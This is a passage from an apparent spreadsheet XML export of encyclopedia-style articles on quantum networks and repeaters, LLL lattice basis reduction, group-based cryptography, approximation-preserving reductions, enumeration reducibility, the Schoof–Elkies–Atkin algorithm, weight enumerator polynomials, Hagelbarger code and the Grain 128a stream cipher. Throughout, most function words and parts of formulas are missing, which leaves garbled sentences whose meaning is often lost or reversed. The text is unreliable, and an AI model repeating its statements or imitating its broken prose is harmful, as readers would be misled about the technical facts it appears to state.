k_{ar}} similarly, quantum distribution generate {\displaystyle k_{rb}} obtain {\displaystyle k_{ab}} follows: sends {\displaystyle k_{ab}} encrypted {\displaystyle k_{ar}} decrypts obtain {\displaystyle k_{ab}} re-encrypts {\displaystyle k_{ab}} using {\displaystyle k_{rb}} sends decrypts obtain {\displaystyle k_{ab}} share {\displaystyle k_{ab}} secure outside eavesdropper, clearly repeater also knows {\displaystyle k_{ab}} this means subsequent communication provide security, secure long trust repeater quantum repeaters true quantum repeater allows generation quantum entanglement, thus using quantum teleportation transmission qubits. quantum distribution protocols test entanglement. this means making encryption keys, sender receiver secure even trust quantum repeater. application quantum internet also requires transmission qubits, thus quantum repeater. quantum repeaters allow entanglement established distant nodes without physically sending entangled qubit entire distance.in case, quantum network consists many short distance links perhaps tens hundreds kilometers. simplest case single repeater, pairs entangled qubits established: {\displaystyle |a\rangle {\displaystyle |r_{a}\rangle located sender repeater, second pair {\displaystyle |r_{b}\rangle {\displaystyle |b\rangle located repeater receiver. these initial entangled qubits easily created, example parametric conversion, qubit physically transmitted adjacent node. point, repeater perform bell measurement qubits {\displaystyle |r_{a}\rangle {\displaystyle |r_{b}\rangle thus teleporting quantum state {\displaystyle |r_{a}\rangle onto {\displaystyle |b\rangle this effect "swapping" entanglement {\displaystyle |a\rangle {\displaystyle |b\rangle entangled distance twice initial entangled pairs. seen network repeaters used linearly hierarchical fashion establish entanglement great distances.hardware platforms suitable nodes also function quantum repeaters. however, also hardware platforms specific task acting repeater, without capabilities performing quantum gates. error correction error correction used quantum repeaters. technological limitations, however, applicability limited short distances quantum error correction schemes capable protecting qubits long distances would require extremely large amount qubits hence extremely large quantum computers. errors communication broadly classified types: loss errors (due optical fiber/environment) operation errors (such depolarization, dephasing etc.). while redundancy used detect correct classical errors, redundant qubits cannot created no-cloning theorem. result, types error correction must introduced shor code number general efficient codes. codes work distributing quantum information across multiple entangled qubits operation errors well loss errors corrected.in addition quantum error correction, classical error correction employed quantum networks special cases quantum distribution. cases, goal quantum communication securely transmit string classical bits. traditional error correction codes hamming codes applied string encoding transmission quantum network. entanglement purification quantum decoherence occur qubit maximally entangled bell state transmitted across quantum network. entanglement purification allows creation nearly maximally entangled qubits large number arbitrary weakly entangled qubits, thus provides additional protection errors. entanglement purification (also known entanglement distillation) already demonstrated nitrogen-vacancy centers diamond. applications quantum internet supports numerous applications, enabled quantum entanglement. general, quantum entanglement well suited tasks require coordination, synchronization privacy. examples applications include quantum distribution, clock stabilization, protocols distributed system problems leader election byzantine agreement, extending baseline telescopes, well position verification, secure identification two-party cryptography noisy-storage model. quantum internet also enables secure access quantum computer cloud. specifically, quantum internet enables simple quantum devices connect remote quantum computer computations performed without quantum computer finding computation actually (the input output quantum states measured without destroying computation, circuit composition used calculation known). secure communications when comes communicating form largest issue always keeping communications private. quantum networks would allow information created, stored transmitted, potentially achieving level privacy, security computational clout impossible achieve today’s internet."by applying quantum operator user selects system information information sent receiver without chance eavesdropper able accurately able record sent information without either sender receiver knowing. unlike classical information transmitted bits assigned either value, quantum information used quantum networks uses quantum bits (qubits), value time, state superposition. this works listener tries listen change information unintended listening, thereby tipping hand people attacking. secondly, without proper quantum operator decode information corrupt sent information without able themselves. furthermore, qubits encoded variety materials, including polarization photons spin states electrons. current status quantum internet present, network connecting quantum processors, quantum repeaters deployed outside lab. example prototype quantum communication network eight-user city-scale quantum network described paper published september 2020. network located bristol used already deployed fibre-infrastructure worked without active switching trusted nodes.in 2022, physicist delft university technology netherlands taken significant step toward network future using technique called quantum teleportation sends data three physical locations previously possible locations. quantum networks computation 2021, researchers planck institute quantum optics germany reported first prototype quantum logic gates distributed quantum computers. experimental quantum modems research team max-planck-institute quantum optics garching, germany finding success transporting quantum data flying stable qubits infrared spectrum matching. this requires sophisticated, super-cooled yttrium silicate crystal sandwich erbium mirrored environment achieve resonance matching infrared wavelengths found fiber optic networks. team successfully demonstrated device works without data loss. mobile quantum networks 2021, researchers china reported successful transmission entangled photons drones, used nodes development mobile quantum networks flexible network extensions. this could first work entangled particles sent moving devices. quantum distribution networks several test networks deployed tailored task quantum distribution either short distances (but connecting many users), larger distances relying trusted repeaters. these networks allow transmission qubits creation entanglement away nodes. darpa quantum network starting early 2000s, darpa began sponsorship quantum network development project implementing secure communication. darpa quantum network became operational within technologies laboratory late 2003 expanded 2004 include nodes harvard boston universities. network consists multiple physical layers including fiber optics supporting phase-modulated lasers entangled photons well free-space links.secoqc vienna network from 2003 2008 secure communication based quantum cryptography (secoqc) project developed collaborative network number european institutions. architecture chosen secoqc project trusted repeater architecture consists point-to-point quantum links devices long distance communication accomplished repeaters.chinese hierarchical network 2009, hierarchical quantum network demonstrated wuhu, china. hierarchical network consists backbone network four nodes connecting number subnets. backbone nodes connected optical switching quantum router. nodes within subnet also connected optical switch connected backbone network trusted relay.geneva area network (swissquantum) swissquantum network developed tested 2009 2011 linked facilities cern university geneva hepia geneva. swissquantum program focused transitioning technologies developed secoqc research quantum networks production environment. particular integration existing telecommunication networks, reliability robustness.tokyo network 2010, number organizations japan european union setup tested tokyo network. tokyo network build upon existing technologies adopted secoqc like network architecture. first time, one-time-pad encryption implemented high enough data rates support popular end-user application secure voice video conferencing. previous large-scale networks typically used classical encryption algorithms high-rate data transfer quantum-derived keys rate data regularly re-keying classical encryption algorithms.beijing-shanghai trunk line september 2017, 2000-km quantum distribution network beijing shanghai, china, officially opened. this trunk line serve backbone connecting quantum networks beijing, shanghai, jinan shandong province hefei anhui province. during opening ceremony, employees bank communications completed transaction shanghai beijing using network. state grid corporation china also developing managing application link. line uses trusted nodes repeaters. quantum telecommunication network also service wuhan, capital central china's hubei province, connected trunk. other similar city quantum networks along yangtze river planned follow. 2021, researchers working network networks reported combined optical fibers qkd-ground-to-satellite links using trusted relay structure total distance nodes ~4,600 makes earth's largest integrated quantum communication network.iqnet iqnet (intelligent quantum networks technologies) founded 2017 caltech at&amp;t. together, collaborating fermi national accelerator laboratory, propulsion laboratory. december 2020, iqnet published work quantum reported successful teleportation time-bin qubits across fiber. first time, published work includes theoretical modelling experimental setup. test beds performed measurements caltech quantum network fermilab quantum network. this research represents important step establishing quantum internet future, would revolutionise fields secure communication, data storage, precision sensing, computing. also quantum mechanics quantum computer quantum references external links https://web.archive.org/web/20090716121402/http://itvibe.com/news/2583/ http://www.vnunet.com/vnunet/news/2125164/first-quantum-computr-network-goes-online elliott, chip (2004). "the darpa quantum network". arxiv:quant-ph/0412029. http://www.cse.wustl.edu/~jain/cse571-07/ftp/quantum/ https://web.archive.org/web/20141229113448/http://www.ipod.org.uk/reality/reality_quantum_entanglement.asp</t>
  </si>
  <si>
    <t>Lenstra–Lenstra–Lovász lattice basis reduction algorithm</t>
  </si>
  <si>
    <t>lenstra–lenstra–lovász (lll) lattice basis reduction algorithm polynomial time lattice reduction algorithm invented arjen lenstra, hendrik lenstra lászló lovász 1982. given basis {\displaystyle \mathbf =\{\mathbf _{1},\mathbf _{2},\dots ,\mathbf _{d}\}} n-dimensional integer coordinates, lattice discrete subgroup {\displaystyle d\leq algorithm calculates lll-reduced (short, nearly orthogonal) lattice basis time {\displaystyle largest length {\displaystyle \mathbf _{i}} euclidean norm, {\displaystyle b=\max \left(\|\mathbf _{1}\|_{2},\|\mathbf _{2}\|_{2},\dots ,\|\mathbf _{d}\|_{2}\right)} .the original applications give polynomial-time algorithms factorizing polynomials rational coefficients, finding simultaneous rational approximations real numbers, solving integer linear programming problem fixed dimensions. reduction precise definition lll-reduced follows: given basis define gram–schmidt process orthogonal basis gram-schmidt coefficients {\displaystyle 1\leq j&lt;i\leq then basis {\displaystyle lll-reduced exists parameter {\displaystyle \delta (0.25, following holds: (size-reduced) {\displaystyle 1\leq j&lt;i\leq n\colon \left|\mu _{i,j}\right|\leq 0.5} definition, property guarantees length reduction ordered basis. (lovász condition) 2,3,..,n {\displaystyle \colon \delta \vert \mathbf _{k-1}^{*}\vert ^{2}\leq \vert \mathbf _{k}^{*}\vert ^{2}+\mu _{k,k-1}^{2}\vert \mathbf _{k-1}^{*}\vert ^{2}} .here, estimating value {\displaystyle \delta parameter, conclude well basis reduced. greater values {\displaystyle \delta lead stronger reductions basis. initially, lenstra, lenstra lovász demonstrated lll-reduction algorithm {\displaystyle \delta ={\frac {3}{4}}} note although lll-reduction well-defined {\displaystyle \delta polynomial-time complexity guaranteed {\displaystyle \delta 0.25 {\displaystyle (0.25,1)} algorithm computes lll-reduced bases. there known efficient algorithm compute basis basis vectors short possible lattices dimensions greater however, lll-reduced basis nearly short possible, sense absolute bounds {\displaystyle c_{i}&gt;1} first basis vector {\displaystyle c_{1}} times long shortest vector lattice, second basis vector likewise within {\displaystyle c_{2}} second successive minimum, applications early successful application algorithm andrew odlyzko herman riele disproving mertens conjecture.the algorithm found numerous applications mimo detection algorithms cryptanalysis public-key encryption schemes: knapsack cryptosystems, particular settings, ntruencrypt, forth. algorithm used find integer solutions many problems.in particular, algorithm forms core integer relation algorithms. example, believed r=1.618034 (slightly rounded) root unknown quadratic equation integer coefficients, apply reduction lattice {\displaystyle \mathbf ^{4}} spanned 10000 10000 {\displaystyle [1,0,0,10000r^{2}],[0,1,0,10000r],} 10000 {\displaystyle [0,0,1,10000]} first vector reduced basis integer linear combination three, thus necessarily form 10000 {\displaystyle [a,b,c,10000(ar^{2}+br+c)]} vector "short" small {\displaystyle ar^{2}+br+c} even smaller. thus first three entries short vector likely coefficients integral quadratic polynomial root. example algorithm finds shortest vector 0.00025] indeed {\displaystyle x^{2}-x-1} root equal golden ratio, 1.6180339887.... properties lll-reduced basis {\displaystyle \mathbf =\{\mathbf _{1},\mathbf _{2},\dots ,\mathbf _{n}\}} {\displaystyle \delta -lll-reduced basis lattice {\displaystyle {\mathcal {l}}} from definition lll-reduced basis, derive several useful properties {\displaystyle \mathbf first vector basis cannot much larger shortest non-zero vector: {\displaystyle \vert \mathbf _{1}\vert \leq (2/({\sqrt {4\delta -1}}))^{n-1}\cdot \lambda _{1}({\mathcal {l}})} particular, {\displaystyle \delta =3/4} gives {\displaystyle \vert \mathbf _{1}\vert \leq 2^{(n-1)/2}\cdot \lambda _{1}({\mathcal {l}})} first vector basis also bounded determinant lattice: {\displaystyle \vert \mathbf _{1}\vert \leq (2/({\sqrt {4\delta -1}}))^{(n-1)/2}\cdot (\det({\mathcal {l}}))^{1/n}} particular, {\displaystyle \delta =3/4} gives {\displaystyle \vert \mathbf _{1}\vert \leq 2^{(n-1)/4}\cdot (\det({\mathcal {l}}))^{1/n}} product norms vectors basis cannot much larger determinant lattice: {\displaystyle \delta =3/4} {\textstyle \prod _{i=1}^{n}\vert \mathbf _{i}\vert \leq 2^{n(n-1)/4}\cdot \det({\mathcal {l}})} algorithm pseudocode following description based (hoffstein, pipher silverman 2008, theorem 6.68), corrections errata. input lattice basis ..., parameter commonly procedure gramschmidt({b0, ..., bn}) {b0*, ..., bn*}; normalize μi,j innerproduct(bi, bj*)/innerproduct(bj*, bj*); using current values |μk,j| ⌊μk,j⌉bj; update related μi,j's needed. (the naive method recompute whenever changes: gramschmidt({b0, ..., bn}) {b0*, ..., bn*}) innerproduct(bk*, bk*) μ2k,k−1) innerproduct(bk−1*, bk−1*) else swap bk−1; update related μi,j's needed. max(k−1, return reduced basis {b0, ..., output reduced basis ..., examples example lattice basis {\displaystyle \mathbf _{1},\mathbf _{2},\mathbf _{3}\in \mathbf ^{3}} given columns reduced basis size-reduced, satisfies lovász condition, hence lll-reduced, described above. bosma. details reduction process. example z[i]4 likewise, basis complex integers given columns matrix below, columns matrix give lll-reduced basis. implementations implemented arageli function lll_reduction_int fplll stand-alone implementation flint function fmpz_lll function lllreducedbasis macaulay2 function package lllbases magma functions lllgram (taking gram matrix) maple function integerrelations[lll] mathematica function latticereduce number theory library (ntl) function pari/gp function qflll pymatgen function analysis.get_lll_reduced_lattice sagemath method driven fplll isabelle/hol 'archive formal proofs' entry lll_basis_reduction. this code exports efficiently executable haskell. also coppersmith method notes references napias, huguette (1996). generalization algorithm euclidean rings orders". journal théorie nombres bordeaux. (2): 387–396. doi:10.5802/jtnb.176. cohen, henri (2000). course computational algebraic number theory. gtm. vol. 138. springer. isbn 3-540-55640-0. borwein, peter (2002). computational excursions analysis number theory. isbn 0-387-95444-9. luk, franklin qiao, sanzheng (2011). pivoted algorithm". linear algebra applications. (11): 2296–2307. doi:10.1016/j.laa.2010.04.003. hoffstein, jeffrey; pipher, jill; silverman, j.h. (2008). introduction mathematical cryptography. springer. isbn 978-0-387-77993-5.</t>
  </si>
  <si>
    <t>Group-based cryptography</t>
  </si>
  <si>
    <t>group-based cryptography groups construct cryptographic primitives. group general algebraic object cryptographic schemes groups way. particular diffie–hellman exchange uses finite cyclic groups. term group-based cryptography refers mostly cryptographic protocols infinite nonabelian groups braid group. examples shpilrain–zapata public-key protocols magyarik–wagner public protocol anshel–anshel–goldfeld exchange ko–lee exchange protocol also non-commutative cryptography references shpilrain zapata, combinatorial group theory public cryptography, appl. algebra eng. commun. comput. (2006), 3-4, 291–302. myasnikov, shpilrain, ushakov, group-based cryptography. advanced courses mathematics barcelona, birkhauser basel, 2008. magyarik wagner, public cryptosystem based word problem. advances cryptology—crypto 1984, lecture notes computer science 196, 19–36. springer, berlin, 1985. anshel, anshel, goldfeld, algebraic method public-key cryptography, math. res. lett. (1999), 287–291. lee, cheon, han, kang, park, public-key cryptosystem using braid groups. advances cryptology—crypto 2000, lecture notes computer science 1880, 166–183. springer, berlin, 2000. external links cryptography braid groups page</t>
  </si>
  <si>
    <t>Approximation-preserving reduction</t>
  </si>
  <si>
    <t>computability theory computational complexity theory, especially study approximation algorithms, approximation-preserving reduction algorithm transforming optimization problem another problem, distance solutions optimal preserved degree. approximation-preserving reductions subset general reductions complexity theory; difference approximation-preserving reductions usually make statements approximation problems optimization problems, opposed decision problems. intuitively, problem reducible problem approximation-preserving reduction given instance problem (possibly approximate) solver problem convert instance problem instance problem apply solver problem recover solution problem also guarantee approximation. definition unlike reductions decision problems, approximation-preserving reduction must preserve truth problem instances reducing problem another. must also maintain guarantee relationship cost solution cost optimum problems. formalize: optimization problems. instance problem optimal solution {\displaystyle {\text{opt}}(x)} {\displaystyle c_{a}(x,y)} denote cost solution instance problem this also metric used determine solution considered optimal. approximation-preserving reduction pair functions {\displaystyle (f,g)} (which often must computable polynomial time), that: maps instance instance {\displaystyle maps solution {\displaystyle solution preserves guarantee solution's performance, approximation ratio, defined {\displaystyle r_{a}(x,y)=\max \left({\frac {c_{a}(x,{\text{opt}}(x))}{c_{a}(x,y)}},{\frac {c_{a}(x,y)}{c_{a}(x,{\text{opt}}(x))}}\right)} types there many different types approximation-preserving reductions, different guarantee (the third point definition above). however, unlike reductions, approximation-preserving reductions often overlap properties demonstrate optimization problems (e.g. complexity class membership completeness, inapproximability). different types reductions used instead varying reduction techniques, applicable reduction easily adapted problem used. types approximation-preserving reductions used show membership approximability complexity classes, notable ptas apx. reduction preserves membership complexity class given problem reduces problem reduction scheme, well. some reductions shown preserve membership ptas, other. because this, careful choice must made selecting approximation-preserving reductions, especially purpose proving completeness problem within complexity class. crescenzi suggests three ideal styles reduction, ease proving power, ptas reduction, reduction, l-reduction. reduction descriptions follow crescenzi's survey approximation-preserving reductions. strict reduction strict reduction simplest type approximation-preserving reduction. strict reduction, approximation ratio solution instance problem must good approximation ratio corresponding solution instance problem words: {\displaystyle r_{a}(x,y)\leq r_{b}(x',y')} {\displaystyle x'=f(x),y=g(y')} .strict reduction straightforward: strict reduction problem problem exists, problem always approximated least good ratio problem strict reduction preserves membership ptas apx. there exists similar concept s-reduction, {\displaystyle c_{a}(x,y)=c_{b}(x',y')} optima corresponding instances must cost well. s-reduction special case strict reduction, even constraining. effect, problems must near-perfect correspondence other. existence s-reduction implies existence strict reduction every reduction listed here. l-reduction l-reductions preserve membership ptas well (but minimization problems case latter). result, cannot used general prove completeness results apx, log-apx, poly-apx, nevertheless valued natural formulation ease proofs. ptas-reduction ptas-reduction another commonly used reduction scheme. though preserves membership ptas, apx. nevertheless, apx-completeness defined terms ptas reductions. ptas-reductions generalization p-reductions, shown below, difference function allowed depend approximation ratio a-reduction p-reduction a-reduction p-reduction similar reduction schemes used show membership ptas respectively. both introduce function defined numbers greater must computable. a-reduction, {\displaystyle r_{b}(x',y')\leq r\rightarrow r_{a}(x,y)\leq c(r)} p-reduction, {\displaystyle r_{b}(x',y')\leq c(r)\rightarrow r_{a}(x,y)\leq .the existence p-reduction implies existence ptas-reduction. e-reduction e-reduction, generalization strict reduction implies a-reduction p-reduction, example less restrictive reduction style preserves membership ptas apx, also larger classes log-apx poly-apx. e-reduction introduces parameters, polynomial constant {\displaystyle \beta definition follows. e-reduction, polynomial constant {\displaystyle \beta {\displaystyle c_{b}({\text{opt}}_{b}(x'))\leq p(|x|)c_{a}({\text{opt}}_{a}(x))} {\displaystyle |x|} denotes size problem instance's description. solution {\displaystyle {\displaystyle r_{a}(x,y)\leq 1+\beta \cdot (r_{b}(x',y')-1)} obtain a-reduction e-reduction, {\displaystyle c(r)=1+\beta \cdot (r-1)} obtain p-reduction e-reduction, {\displaystyle c(r)=1+(r-1)/\beta ap-reduction ap-reductions used define completeness classes log-apx poly-apx. they special case ptas reduction, meeting following restrictions. ap-reduction, constant {\displaystyle \alpha {\displaystyle r_{b}(x',y')\leq r\rightarrow r_{a}(x,y)\leq 1+\alpha \cdot (r-1)} additional generalization function allowed depend approximation ratio ptas-reduction. ap-reduction also generalization e-reduction. additional restriction actually needs imposed ap-reduction preserve log-apx poly-apx membership, e-reduction does: fixed problem size, computation time must non-increasing approximation ratio increases. reduction reduction type reduction that, useful proving inapproximability results, resemble reductions shown here. reductions deal optimization problems within decision problem container, generated changing problem goal distinguishing optimal solution solutions multiplicative factor worse optimum. also reduction (complexity) ptas reduction l-reduction approximation algorithm references</t>
  </si>
  <si>
    <t>Enumeration reducibility</t>
  </si>
  <si>
    <t>computablity theory computational complexity theory, enumeration reducibility method reduction determines effective procedure determining enumerability sets natural numbers. enumeration context e-reducibility listing elements particular set, collection items, though necessarily ordered complete. e-reducibility form positive reducibility, meaning positive information processed. positive information denotes logic syntax "and" {\displaystyle \land ,\and "or" {\displaystyle \lor ,\|} syntax negation, "not" {\displaystyle \neg included used. according hartley rogers jr., intuitive model used explain e-reducibility follows:let sets {\displaystyle {\displaystyle given. consider procedure determined finite instructions following way. computation begun. computation proceeds algorithmically except that, time time, computing agent requested obtain “input" integer, and, time time procedure yields “output” integer. when input requested, integer, integer, supplied. assume members {\displaystyle supplied, order whatsoever inputs, computation always eventually yields {\displaystyle order, outputs. order members {\displaystyle appear vary order inputs varies. permit repetitions listing {\displaystyle listing {\displaystyle procedure exists {\displaystyle enumeration reducible {\displaystyle .the concept e-reducibility first introduced results john myhill, concluded many-one complete recursively enumerable complement productive". this result extends e-reducibility well. e-reducibility later formally codified rogers collaborator richard friedberg zeitschrift mathematische logik grundlagen mathematik (the predecessor mathematical logic quarterly) 1959. definitions definitions provided below, {\displaystyle \omega denote natural numbers {\displaystyle \mathbb {\displaystyle a,b...} denote subsets {\displaystyle \omega lower case letters {\displaystyle n,x...} {\displaystyle f,g...} represent numbers functions {\displaystyle \omega {\displaystyle \omega rogers' informal definition addition intuitive model, rogers also provided concise reformulation create informal definition. reads: {\displaystyle a,b\subseteq \omega enumeration reducible {\displaystyle effective procedure getting enumeration {\displaystyle enumeration {\displaystyle thus write: {\displaystyle a\leq _{e}b} standard notation enumeration reducibility. precise definition from rogers' informal definition, precise definition inferred. {\displaystyle a,b\subseteq \omega ,a\leq _{e}b} exists computably enumerable {\displaystyle that, {\displaystyle x\in \omega {\displaystyle x\in {\displaystyle \leftrightarrow {\displaystyle \exists d[\langle x,d\rangle {\displaystyle \and {\displaystyle d\subseteq b].} case, write {\displaystyle a\leq _{e}b} {\displaystyle {\displaystyle (the enumeration operator) witnesses {\displaystyle a\leq _{e}b} properties equivalence {\displaystyle a\leq _{e}b} {\displaystyle b\leq _{e}a,} {\displaystyle considered equivalent enumeration {\displaystyle thus write {\displaystyle a\equiv _{e}b.} conversely, {\displaystyle a\leq _{e}b} {\displaystyle b\nleq _{e}a,} write {\displaystyle a&lt;_{e}b.} inversely, {\displaystyle a\nleq _{e}b} {\displaystyle b\nleq _{e}a,} write {\displaystyle {\displaystyle |_{e}} {\displaystyle supremum supremum (least upper bound) sets {\displaystyle {\displaystyle respect {\displaystyle \leq _{e}} modeled symmetric difference equation. this equation accounts lack information abstract variable {\displaystyle squared intersection (expressed {\displaystyle \cup symbol; union.) written {\displaystyle a\delta b=(2n} {\displaystyle {\displaystyle n\in a)\cup (2n+1} {\displaystyle {\displaystyle n\in b).} turing reduction relationship turing reducibility, e-reducibility, relation "computably enumerable shown {\displaystyle a^{+}} given different properties {\displaystyle a^{+}=a\delta {\overline {a}}} this codes positive regardless positive negative information supplied. formally expressed follows: {\displaystyle a\leq _{t}b} {\displaystyle \leftrightarrow {\displaystyle a^{+}\leq _{e}b^{+}} {\displaystyle computably enumerable {\displaystyle a\leq _{e}b^{+}.} variants strong enumeration reducibilities addition e-reducibility, exist strong versions, important s-reducibility (named robert solovay). s-reducibility states computably enumerable real {\displaystyle s-reducible another computably enumerable real {\displaystyle {\displaystyle least difficult approximated {\displaystyle this method shows similarity e-reducibility compares elements multiple sets. addition, structure s-degrees natural analogs enumeration degrees.the reasoning using s-reducibility summarized omandaze sorbi result positive reducibility models unable answer certain oracle questions (e.g. answer {\displaystyle x\in given {\displaystyle x\in true inverse.) inherently model computational situations incomplete oracle information available. this contrast well-studied turing reducibility, information captured negative positive values. addition, t-reducibility uses information provided immediately without delay. strong reducibility utilized order prevent problems occurring incomplete information supplied. partial functions e-reducibility defined partial functions well. writing graph {\displaystyle (f)=\{\langle x,y\rangle {\displaystyle {\displaystyle f(x)=y\}} etc., define partial functions {\displaystyle f,g} {\displaystyle f\leq _{e}g\leftrightarrow graph {\displaystyle (f)\leq _{e}} graph {\displaystyle (g).} kleene's recursion theorem introduces notion relative partial recursiveness, which, means systems equations, demonstrate equivalence {\displaystyle \leq _{e}} graphs partial functions. e-reducibility relates relative partial recursiveness t-reducibility relates μ-recursiveness. also turing reduction many-one reduction truth-table reduction arithmetical hierarchy references further reading introduction metamathematics "theory recursive functions effective computability" enumeration reducibility polynomial time</t>
  </si>
  <si>
    <t>Schoof–Elkies–Atkin algorithm</t>
  </si>
  <si>
    <t>schoof–elkies–atkin algorithm (sea) algorithm used finding order calculating number points elliptic curve finite field. primary application elliptic curve cryptography. algorithm extension schoof's algorithm noam elkies atkin significantly improve efficiency (under heuristic assumptions). details elkies-atkin extension schoof's algorithm works restricting primes {\displaystyle s=\{l_{1},\ldots ,l_{s}\}} considered primes certain kind. these came called elkies primes atkin primes respectively. prime {\displaystyle called elkies prime characteristic equation: {\displaystyle \phi ^{2}-t\phi +q=0} splits {\displaystyle \mathbb _{l}} atkin prime prime elkies prime. atkin showed combine information obtained atkin primes information obtained elkies primes produce efficient algorithm, came known schoof–elkies–atkin algorithm. first problem address determine whether given prime elkies atkin. order make modular polynomials {\displaystyle \phi _{l}(x,y)} parametrize pairs {\displaystyle -isogenous elliptic curves terms j-invariants practice alternative modular polynomials also used purpose). instantiated polynomial {\displaystyle \phi _{l}(x,j(e))} root {\displaystyle j(e')} {\displaystyle \mathbb _{q}} {\displaystyle elkies prime, compute polynomial {\displaystyle f_{l}(x)} whose roots correspond points kernel {\displaystyle -isogeny {\displaystyle {\displaystyle polynomial {\displaystyle f_{l}} divisor corresponding division polynomial used schoof's algorithm, significantly lower degree, {\displaystyle o(l)} versus {\displaystyle o(l^{2})} elkies primes, allows compute number points {\displaystyle modulo {\displaystyle efficiently schoof's algorithm. case atkin prime, gain information factorization pattern {\displaystyle \phi _{l}(x,j(e))} {\displaystyle \mathbb _{l}[x]} constrains possibilities number points modulo {\displaystyle asymptotic complexity algorithm depends entirely elkies primes. provided sufficiently many small elkies primes average, expect half primes {\displaystyle elkies primes), results reduction running time. resulting algorithm probabilistic vegas type), expected running time heuristically, {\displaystyle {\tilde {o}}(\log ^{4}q)} making efficient practice schoof's algorithm. here {\displaystyle {\tilde {o}}} notation variant notation suppresses terms logarithmic main term expression. implementations schoof–elkies–atkin algorithm implemented pari/gp computer algebra system function ellap. external links "schoof: counting points elliptic curves finite fields" article mathworld "remarks schoof-elkies-atkin algorithm" "the schoof-elkies-atkin algorithm characteristic</t>
  </si>
  <si>
    <t>Enumerator polynomial</t>
  </si>
  <si>
    <t>coding theory, weight enumerator polynomial binary linear code specifies number words possible hamming weight. {\displaystyle c\subset \mathbb _{2}^{n}} binary linear code length {\displaystyle weight distribution sequence numbers {\displaystyle a_{t}=\#\{c\in c\mid w(c)=t\}} giving number codewords weight ranges weight enumerator bivariate polynomial {\displaystyle w(c;x,y)=\sum _{w=0}^{n}a_{w}x^{w}y^{n-w}.} basic properties {\displaystyle w(c;0,1)=a_{0}=1} {\displaystyle w(c;1,1)=\sum _{w=0}^{n}a_{w}=|c|} otherwise {\displaystyle w(c;1,0)=a_{n}=1{\mbox{ }}(1,\ldots ,1)\in {\mbox{ }}0{\mbox{ otherwise}}} {\displaystyle w(c;1,-1)=\sum _{w=0}^{n}a_{w}(-1)^{n-w}=a_{n}+(-1)^{1}a_{n-1}+\ldots +(-1)^{n-1}a_{1}+(-1)^{n}a_{0}} macwilliams identity denote dual code {\displaystyle c\subset \mathbb _{2}^{n}} {\displaystyle c^{\perp }=\{x\in \mathbb _{2}^{n}\,\mid \,\langle x,c\rangle =0{\mbox{ }}\forall c\in c\}} (where {\displaystyle \langle \rangle denotes vector product taken {\displaystyle \mathbb _{2}} macwilliams identity states {\displaystyle w(c^{\perp };x,y)={\frac {1}{\mid c\mid }}w(c;y-x,y+x).} identity named jessie macwilliams. distance enumerator distance distribution inner distribution code size length sequence numbers {\displaystyle a_{i}={\frac {1}{m}}\#\left\lbrace (c_{1},c_{2})\in c\times c\mid d(c_{1},c_{2})=i\right\rbrace ranges distance enumerator polynomial {\displaystyle a(c;x,y)=\sum _{i=0}^{n}a_{i}x^{i}y^{n-i}} linear equal weight enumerator. outer distribution 2n-by-n+1 matrix rows indexed elements gf(2)n columns indexed integers 0...n, entries {\displaystyle b_{x,i}=\#\left\lbrace c\in c\mid d(c,x)=i\right\rbrace rows times inner distribution vector (a0,...,an). code regular rows corresponding codewords equal. references hill, raymond (1986). first course coding theory. oxford applied mathematics computing science series. oxford university press. 165–173. isbn 0-19-853803-0. pless, vera (1982). introduction theory error-correcting codes. wiley-interscience series discrete mathematics. john wiley sons. 103–119. isbn 0-471-08684-3. j.h. lint (1992). introduction coding theory. gtm. vol. (2nd ed.). springer-verlag. isbn 3-540-54894-7. chapters 4.3.</t>
  </si>
  <si>
    <t>Hagelbarger code</t>
  </si>
  <si>
    <t>telecommunication, hagelbarger code convolutional code enables error bursts corrected provided relatively long error-free intervals error bursts. hagelbarger code, inserted parity check bits spread time error burst likely affect groups parity checked. references this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Grain 128a</t>
  </si>
  <si>
    <t>grain 128a stream cipher first purposed symmetric encryption workshop (skew) 2011 improvement predecessor grain 128, added security enhancements optional message authentication using encrypt approach. important features grain family throughput increased expense additional hardware. grain 128a designed martin ågren, martin hell, thomas johansson willi meier. description cipher grain 128a consists large parts: pre-output function mac. pre-output function internal state size bits, consisting registers size bit: nlfsr lfsr. supports variable lengths {\displaystyle 0&lt;w\leq cipher uses key. cipher supports modes operation: without authentication, configured supplied {\displaystyle iv_{0}} {\displaystyle iv_{0}=1} authentication message enabled, {\displaystyle iv_{0}=0} authentication message disabled. pre-output function pre-output function consists registers size bit: nlfsr {\displaystyle lfsr {\displaystyle along feedback polynomials {\displaystyle {\displaystyle boolean function {\displaystyle {\displaystyle f(x)=1+x^{32}+x^{47}+x^{58}+x^{90}+x^{121}+x^{128}} {\displaystyle g(x)=1+x^{32}+x^{37}+x^{72}+x^{102}+x^{128}+x^{44}x^{60}+x^{61}x^{125}+x^{63}x^{67}x^{69}x^{101}+x^{80}x^{88}+x^{110}x^{111}+x^{115}x^{117}+x^{46}x^{50}x^{58}+x^{103}x^{104}x^{106}+x^{33}x^{35}x^{36}x^{40}} {\displaystyle h(x)=b_{i+12}s_{i+8}+s_{i+13}s_{i+20}+b_{i+95}s_{i+42}+s_{i+60}s_{i+79}+b_{i+12}b_{i+95}s_{i+94}} addition feedback polynomials, update functions nlfsr lfsr are: {\displaystyle b_{i+128}=s_{i}+b_{i}+b_{i+26}+b_{i+56}+b_{i+91}+b_{i+96}+b_{i+3}b_{i+67}+b_{i+11}b_{i+13}+b_{i+17}b_{i+18}+b_{i+27}b_{i+59}+b_{i+40}b_{i+48}+b_{i+61}b_{i+65}+b_{i+68}b_{i+84}+b_{i+88}b_{i+92}b_{i+93}b_{i+95}+b_{i+22}b_{i+24}b_{i+25}+b_{i+70}b_{i+78}b_{i+82}} {\displaystyle s_{i+128}=s_{i}+s_{i+7}+s_{i+38}+s_{i+70}+s_{i+81}+s_{i+96}} pre-output stream {\displaystyle defined {\displaystyle y_{i}=h(x)+s_{i+93}+b_{i+2}+b_{i+15}+b_{i+36}+b_{i+45}+b_{i+64}+b_{i+73}+b_{i+89}} initialisation upon initialisation define {\displaystyle bit, {\displaystyle iv_{0}} dictates mode operation. lfsr initialised {\displaystyle s_{i}=iv_{i}} {\displaystyle 0\leq i\leq {\displaystyle s_{i}=1} {\displaystyle 96\leq i\leq 126} {\displaystyle s_{127}=0} last ensures similar key-iv pairs produce shifted versions other. nlfsr initialised copying entire {\displaystyle nlfsr: {\displaystyle b_{i}=k_{i}} {\displaystyle 0\leq i\leq 127} start clocking before pre-output function begin output pre-output stream clocked times warm 